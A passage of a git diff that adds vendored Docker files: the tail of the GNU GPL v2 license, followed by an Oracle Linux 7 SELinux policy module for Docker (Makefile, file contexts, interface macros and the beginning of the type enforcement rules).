The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. 
+ + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. 
+ +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. 
However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. 
+You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. 
If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 
EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. 
+ + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License along + with this program; if not, write to the Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + , 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. 
diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile new file mode 100644 index 0000000000..16df33ef32 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile @@ -0,0 +1,23 @@ +TARGETS?=docker +MODULES?=${TARGETS:=.pp.bz2} +SHAREDIR?=/usr/share + +all: ${TARGETS:=.pp.bz2} + +%.pp.bz2: %.pp + @echo Compressing $^ -\> $@ + bzip2 -9 $^ + +%.pp: %.te + make -f ${SHAREDIR}/selinux/devel/Makefile $@ + +clean: + rm -f *~ *.tc *.pp *.pp.bz2 + rm -rf tmp *.tar.gz + +man: install + sepolicy manpage --domain ${TARGETS}_t + +install: + semodule -i ${TARGETS} + diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md new file mode 100644 index 0000000000..7ea3117a89 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md @@ -0,0 +1 @@ +SELinux policy for docker diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc new file mode 100644 index 0000000000..10b7d52a8b --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc @@ -0,0 +1,33 @@ +/root/\.docker gen_context(system_u:object_r:docker_home_t,s0) + +/usr/bin/docker -- gen_context(system_u:object_r:docker_exec_t,s0) +/usr/bin/docker-novolume-plugin -- gen_context(system_u:object_r:docker_auth_exec_t,s0) +/usr/lib/docker/docker-novolume-plugin -- gen_context(system_u:object_r:docker_auth_exec_t,s0) + +/usr/lib/systemd/system/docker.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) 
+/usr/lib/systemd/system/docker-novolume-plugin.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) + +/etc/docker(/.*)? gen_context(system_u:object_r:docker_config_t,s0) + +/var/lib/docker(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) +/var/lib/kublet(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) +/var/lib/docker/vfs(/.*)? gen_context(system_u:object_r:svirt_sandbox_file_t,s0) + +/var/run/docker(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker\.pid -- gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker\.sock -s gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker-client(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker/plugins(/.*)? gen_context(system_u:object_r:docker_plugin_var_run_t,s0) + +/var/lock/lxc(/.*)? gen_context(system_u:object_r:docker_lock_t,s0) + +/var/log/lxc(/.*)? gen_context(system_u:object_r:docker_log_t,s0) + +/var/lib/docker/init(/.*)? gen_context(system_u:object_r:docker_share_t,s0) +/var/lib/docker/containers/.*/hosts gen_context(system_u:object_r:docker_share_t,s0) +/var/lib/docker/containers/.*/hostname gen_context(system_u:object_r:docker_share_t,s0) +/var/lib/docker/.*/config\.env gen_context(system_u:object_r:docker_share_t,s0) + +# OL7.2 systemd selinux update +/var/run/systemd/machines(/.*)? gen_context(system_u:object_r:systemd_machined_var_run_t,s0) +/var/lib/machines(/.*)? gen_context(system_u:object_r:systemd_machined_var_lib_t,s0) diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if new file mode 100644 index 0000000000..4780af05f7 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if @@ -0,0 +1,659 @@ + +## The open-source application container engine. 
+ +######################################## +## +## Execute docker in the docker domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_domtrans',` + gen_require(` + type docker_t, docker_exec_t; + ') + + corecmd_search_bin($1) + domtrans_pattern($1, docker_exec_t, docker_t) +') + +######################################## +## +## Execute docker in the caller domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_exec',` + gen_require(` + type docker_exec_t; + ') + + corecmd_search_bin($1) + can_exec($1, docker_exec_t) +') + +######################################## +## +## Search docker lib directories. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_search_lib',` + gen_require(` + type docker_var_lib_t; + ') + + allow $1 docker_var_lib_t:dir search_dir_perms; + files_search_var_lib($1) +') + +######################################## +## +## Execute docker lib directories. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_exec_lib',` + gen_require(` + type docker_var_lib_t; + ') + + allow $1 docker_var_lib_t:dir search_dir_perms; + can_exec($1, docker_var_lib_t) +') + +######################################## +## +## Read docker lib files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_read_lib_files',` + gen_require(` + type docker_var_lib_t; + ') + + files_search_var_lib($1) + read_files_pattern($1, docker_var_lib_t, docker_var_lib_t) +') + +######################################## +## +## Read docker share files. +## +## +## +## Domain allowed access. 
+## +## +# +interface(`docker_read_share_files',` + gen_require(` + type docker_share_t; + ') + + files_search_var_lib($1) + list_dirs_pattern($1, docker_share_t, docker_share_t) + read_files_pattern($1, docker_share_t, docker_share_t) + read_lnk_files_pattern($1, docker_share_t, docker_share_t) +') + +###################################### +## +## Allow the specified domain to execute docker shared files +## in the caller domain. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_exec_share_files',` + gen_require(` + type docker_share_t; + ') + + can_exec($1, docker_share_t) +') + +######################################## +## +## Manage docker lib files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_manage_lib_files',` + gen_require(` + type docker_var_lib_t; + ') + + files_search_var_lib($1) + manage_files_pattern($1, docker_var_lib_t, docker_var_lib_t) + manage_lnk_files_pattern($1, docker_var_lib_t, docker_var_lib_t) +') + +######################################## +## +## Manage docker lib directories. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_manage_lib_dirs',` + gen_require(` + type docker_var_lib_t; + ') + + files_search_var_lib($1) + manage_dirs_pattern($1, docker_var_lib_t, docker_var_lib_t) +') + +######################################## +## +## Create objects in a docker var lib directory +## with an automatic type transition to +## a specified private type. +## +## +## +## Domain allowed access. +## +## +## +## +## The type of the object to create. +## +## +## +## +## The class of the object to be created. +## +## +## +## +## The name of the object being created. +## +## +# +interface(`docker_lib_filetrans',` + gen_require(` + type docker_var_lib_t; + ') + + filetrans_pattern($1, docker_var_lib_t, $2, $3, $4) +') + +######################################## +## +## Read docker PID files. +## +## +## +## Domain allowed access. 
+## +## +# +interface(`docker_read_pid_files',` + gen_require(` + type docker_var_run_t; + ') + + files_search_pids($1) + read_files_pattern($1, docker_var_run_t, docker_var_run_t) +') + +######################################## +## +## Execute docker server in the docker domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_systemctl',` + gen_require(` + type docker_t; + type docker_unit_file_t; + ') + + systemd_exec_systemctl($1) + init_reload_services($1) + systemd_read_fifo_file_passwd_run($1) + allow $1 docker_unit_file_t:file read_file_perms; + allow $1 docker_unit_file_t:service manage_service_perms; + + ps_process_pattern($1, docker_t) +') + +######################################## +## +## Read and write docker shared memory. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_rw_sem',` + gen_require(` + type docker_t; + ') + + allow $1 docker_t:sem rw_sem_perms; +') + +####################################### +## +## Read and write the docker pty type. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_use_ptys',` + gen_require(` + type docker_devpts_t; + ') + + allow $1 docker_devpts_t:chr_file rw_term_perms; +') + +####################################### +## +## Allow domain to create docker content +## +## +## +## Domain allowed access. 
+## +## +# +interface(`docker_filetrans_named_content',` + + gen_require(` + type docker_var_lib_t; + type docker_share_t; + type docker_log_t; + type docker_var_run_t; + type docker_home_t; + ') + + files_pid_filetrans($1, docker_var_run_t, file, "docker.pid") + files_pid_filetrans($1, docker_var_run_t, sock_file, "docker.sock") + files_pid_filetrans($1, docker_var_run_t, dir, "docker-client") + logging_log_filetrans($1, docker_log_t, dir, "lxc") + files_var_lib_filetrans($1, docker_var_lib_t, dir, "docker") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "config.env") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hosts") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hostname") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "resolv.conf") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, dir, "init") + userdom_admin_home_dir_filetrans($1, docker_home_t, dir, ".docker") +') + +######################################## +## +## Connect to docker over a unix stream socket. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_stream_connect',` + gen_require(` + type docker_t, docker_var_run_t; + ') + + files_search_pids($1) + stream_connect_pattern($1, docker_var_run_t, docker_var_run_t, docker_t) +') + +######################################## +## +## Connect to SPC containers over a unix stream socket. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_spc_stream_connect',` + gen_require(` + type spc_t, spc_var_run_t; + ') + + files_search_pids($1) + files_write_all_pid_sockets($1) + allow $1 spc_t:unix_stream_socket connectto; +') + +######################################## +## +## All of the rules required to administrate +## an docker environment +## +## +## +## Domain allowed access. 
+## +## +# +interface(`docker_admin',` + gen_require(` + type docker_t; + type docker_var_lib_t, docker_var_run_t; + type docker_unit_file_t; + type docker_lock_t; + type docker_log_t; + type docker_config_t; + ') + + allow $1 docker_t:process { ptrace signal_perms }; + ps_process_pattern($1, docker_t) + + admin_pattern($1, docker_config_t) + + files_search_var_lib($1) + admin_pattern($1, docker_var_lib_t) + + files_search_pids($1) + admin_pattern($1, docker_var_run_t) + + files_search_locks($1) + admin_pattern($1, docker_lock_t) + + logging_search_logs($1) + admin_pattern($1, docker_log_t) + + docker_systemctl($1) + admin_pattern($1, docker_unit_file_t) + allow $1 docker_unit_file_t:service all_service_perms; + + optional_policy(` + systemd_passwd_agent_exec($1) + systemd_read_fifo_file_passwd_run($1) + ') +') + +######################################## +## +## Execute docker_auth_exec_t in the docker_auth domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_auth_domtrans',` + gen_require(` + type docker_auth_t, docker_auth_exec_t; + ') + + corecmd_search_bin($1) + domtrans_pattern($1, docker_auth_exec_t, docker_auth_t) +') + +###################################### +## +## Execute docker_auth in the caller domain. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_auth_exec',` + gen_require(` + type docker_auth_exec_t; + ') + + corecmd_search_bin($1) + can_exec($1, docker_auth_exec_t) +') + +######################################## +## +## Connect to docker_auth over a unix stream socket. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_auth_stream_connect',` + gen_require(` + type docker_auth_t, docker_plugin_var_run_t; + ') + + files_search_pids($1) + stream_connect_pattern($1, docker_plugin_var_run_t, docker_plugin_var_run_t, docker_auth_t) +') + +######################################## +## +## docker domain typebounds calling domain. +## +## +## +## Domain to be typebound. 
+## +## +# +interface(`docker_typebounds',` + gen_require(` + type docker_t; + ') + + typebounds docker_t $1; +') + +######################################## +## +## Allow any docker_exec_t to be an entrypoint of this domain +## +## +## +## Domain allowed access. +## +## +## +# +interface(`docker_entrypoint',` + gen_require(` + type docker_exec_t; + ') + allow $1 docker_exec_t:file entrypoint; +') + +######################################## +## +## Send and receive messages from +## systemd machined over dbus. +## +## +## +## Domain allowed access. +## +## +# +interface(`systemd_dbus_chat_machined',` + gen_require(` + type systemd_machined_t; + class dbus send_msg; + ') + + allow $1 systemd_machined_t:dbus send_msg; + allow systemd_machined_t $1:dbus send_msg; + ps_process_pattern(systemd_machined_t, $1) +') + +######################################## +## +## Allow any svirt_sandbox_file_t to be an entrypoint of this domain +## +## +## +## Domain allowed access. +## +## +## +# +interface(`virt_sandbox_entrypoint',` + gen_require(` + type svirt_sandbox_file_t; + ') + allow $1 svirt_sandbox_file_t:file entrypoint; +') + +######################################## +## +## Send and receive messages from +## virt over dbus. +## +## +## +## Domain allowed access. +## +## +# +interface(`virt_dbus_chat',` + gen_require(` + type virtd_t; + class dbus send_msg; + ') + + allow $1 virtd_t:dbus send_msg; + allow virtd_t $1:dbus send_msg; + ps_process_pattern(virtd_t, $1) +') + +####################################### +## +## Read the process state of virt sandbox containers +## +## +## +## Domain allowed access. +## +## +# +interface(`virt_sandbox_read_state',` + gen_require(` + attribute svirt_sandbox_domain; + ') + + ps_process_pattern($1, svirt_sandbox_domain) +') + +###################################### +## +## Send a signal to sandbox domains +## +## +## +## Domain allowed access. 
+## +## +# +interface(`virt_signal_sandbox',` + gen_require(` + attribute svirt_sandbox_domain; + ') + + allow $1 svirt_sandbox_domain:process signal; +') + +####################################### +## +## Getattr Sandbox File systems +## +## +## +## Domain allowed access. +## +## +# +interface(`virt_getattr_sandbox_filesystem',` + gen_require(` + type svirt_sandbox_file_t; + ') + + allow $1 svirt_sandbox_file_t:filesystem getattr; +') + +####################################### +## +## Read Sandbox Files +## +## +## +## Domain allowed access. +## +## +# +interface(`virt_read_sandbox_files',` + gen_require(` + type svirt_sandbox_file_t; + ') + + list_dirs_pattern($1, svirt_sandbox_file_t, svirt_sandbox_file_t) + read_files_pattern($1, svirt_sandbox_file_t, svirt_sandbox_file_t) + read_lnk_files_pattern($1, svirt_sandbox_file_t, svirt_sandbox_file_t) +') + +####################################### +## +## Read the process state of spc containers +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_spc_read_state',` + gen_require(` + type spc_t; + ') + + ps_process_pattern($1, spc_t) +') + diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te new file mode 100644 index 0000000000..d4de36fe46 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te @@ -0,0 +1,465 @@ +policy_module(docker, 1.0.0) + +######################################## +# +# Declarations +# + +## +##

+## Determine whether docker can +## connect to all TCP ports. +##

+##
+gen_tunable(docker_connect_any, false) + +type docker_t; +type docker_exec_t; +init_daemon_domain(docker_t, docker_exec_t) +domain_subj_id_change_exemption(docker_t) +domain_role_change_exemption(docker_t) + +type spc_t; +domain_type(spc_t) +role system_r types spc_t; + +type docker_auth_t; +type docker_auth_exec_t; +init_daemon_domain(docker_auth_t, docker_auth_exec_t) + +type spc_var_run_t; +files_pid_file(spc_var_run_t) + +type docker_var_lib_t; +files_type(docker_var_lib_t) + +type docker_home_t; +userdom_user_home_content(docker_home_t) + +type docker_config_t; +files_config_file(docker_config_t) + +type docker_lock_t; +files_lock_file(docker_lock_t) + +type docker_log_t; +logging_log_file(docker_log_t) + +type docker_tmp_t; +files_tmp_file(docker_tmp_t) + +type docker_tmpfs_t; +files_tmpfs_file(docker_tmpfs_t) + +type docker_var_run_t; +files_pid_file(docker_var_run_t) + +type docker_plugin_var_run_t; +files_pid_file(docker_plugin_var_run_t) + +type docker_unit_file_t; +systemd_unit_file(docker_unit_file_t) + +type docker_devpts_t; +term_pty(docker_devpts_t) + +type docker_share_t; +files_type(docker_share_t) + +# OL7 systemd selinux update +type systemd_machined_t; +type systemd_machined_exec_t; +init_daemon_domain(systemd_machined_t, systemd_machined_exec_t) + +# /run/systemd/machines +type systemd_machined_var_run_t; +files_pid_file(systemd_machined_var_run_t) + +# /var/lib/machines +type systemd_machined_var_lib_t; +files_type(systemd_machined_var_lib_t) + + +######################################## +# +# docker local policy +# +allow docker_t self:capability { chown kill fowner fsetid mknod net_admin net_bind_service net_raw setfcap }; +allow docker_t self:tun_socket relabelto; +allow docker_t self:process { getattr signal_perms setrlimit setfscreate }; +allow docker_t self:fifo_file rw_fifo_file_perms; +allow docker_t self:unix_stream_socket create_stream_socket_perms; +allow docker_t self:tcp_socket create_stream_socket_perms; +allow docker_t 
self:udp_socket create_socket_perms; +allow docker_t self:capability2 block_suspend; + +docker_auth_stream_connect(docker_t) + +manage_files_pattern(docker_t, docker_home_t, docker_home_t) +manage_dirs_pattern(docker_t, docker_home_t, docker_home_t) +manage_lnk_files_pattern(docker_t, docker_home_t, docker_home_t) +userdom_admin_home_dir_filetrans(docker_t, docker_home_t, dir, ".docker") + +manage_dirs_pattern(docker_t, docker_config_t, docker_config_t) +manage_files_pattern(docker_t, docker_config_t, docker_config_t) +files_etc_filetrans(docker_t, docker_config_t, dir, "docker") + +manage_dirs_pattern(docker_t, docker_lock_t, docker_lock_t) +manage_files_pattern(docker_t, docker_lock_t, docker_lock_t) +files_lock_filetrans(docker_t, docker_lock_t, { dir file }, "lxc") + +manage_dirs_pattern(docker_t, docker_log_t, docker_log_t) +manage_files_pattern(docker_t, docker_log_t, docker_log_t) +manage_lnk_files_pattern(docker_t, docker_log_t, docker_log_t) +logging_log_filetrans(docker_t, docker_log_t, { dir file lnk_file }) +allow docker_t docker_log_t:dir_file_class_set { relabelfrom relabelto }; + +manage_dirs_pattern(docker_t, docker_tmp_t, docker_tmp_t) +manage_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) +manage_lnk_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) +files_tmp_filetrans(docker_t, docker_tmp_t, { dir file lnk_file }) + +manage_dirs_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_lnk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_fifo_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_chr_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_blk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +allow docker_t docker_tmpfs_t:dir relabelfrom; +can_exec(docker_t, docker_tmpfs_t) +fs_tmpfs_filetrans(docker_t, docker_tmpfs_t, { dir file }) +allow docker_t docker_tmpfs_t:chr_file mounton; + +manage_dirs_pattern(docker_t, 
docker_share_t, docker_share_t) +manage_files_pattern(docker_t, docker_share_t, docker_share_t) +manage_lnk_files_pattern(docker_t, docker_share_t, docker_share_t) +allow docker_t docker_share_t:dir_file_class_set { relabelfrom relabelto }; + +can_exec(docker_t, docker_share_t) +#docker_filetrans_named_content(docker_t) + +manage_dirs_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_chr_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_blk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_lnk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +allow docker_t docker_var_lib_t:dir_file_class_set { relabelfrom relabelto }; +files_var_lib_filetrans(docker_t, docker_var_lib_t, { dir file lnk_file }) + +manage_dirs_pattern(docker_t, docker_var_run_t, docker_var_run_t) +manage_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) +manage_sock_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) +manage_lnk_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) +files_pid_filetrans(docker_t, docker_var_run_t, { dir file lnk_file sock_file }) + +allow docker_t docker_devpts_t:chr_file { relabelfrom rw_chr_file_perms setattr_chr_file_perms }; +term_create_pty(docker_t, docker_devpts_t) + +kernel_read_system_state(docker_t) +kernel_read_network_state(docker_t) +kernel_read_all_sysctls(docker_t) +kernel_rw_net_sysctls(docker_t) +kernel_setsched(docker_t) +kernel_read_all_proc(docker_t) + +domain_use_interactive_fds(docker_t) +domain_dontaudit_read_all_domains_state(docker_t) + +corecmd_exec_bin(docker_t) +corecmd_exec_shell(docker_t) + +corenet_tcp_bind_generic_node(docker_t) +corenet_tcp_sendrecv_generic_if(docker_t) +corenet_tcp_sendrecv_generic_node(docker_t) +corenet_tcp_sendrecv_generic_port(docker_t) +corenet_tcp_bind_all_ports(docker_t) +corenet_tcp_connect_http_port(docker_t) +corenet_tcp_connect_commplex_main_port(docker_t) 
